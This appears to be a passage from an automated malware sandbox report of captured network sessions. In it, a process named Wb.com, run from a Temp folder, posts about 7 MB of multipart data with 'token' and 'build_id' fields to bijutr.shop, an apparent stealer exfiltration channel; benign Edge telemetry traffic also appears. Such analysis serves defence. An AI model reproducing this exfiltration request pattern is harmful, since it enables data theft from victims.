                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:13 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      38192.168.2.649973188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----SJECBASJEKF37QIEU37Q
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 6990993
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------SJECBASJEKF37QIEU37QContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------SJECBASJEKF37QIEU37QContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------SJECBASJEKF37QIEU37QCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:20 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      39192.168.2.64997451.104.15.2534437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970511304&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 3822
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1
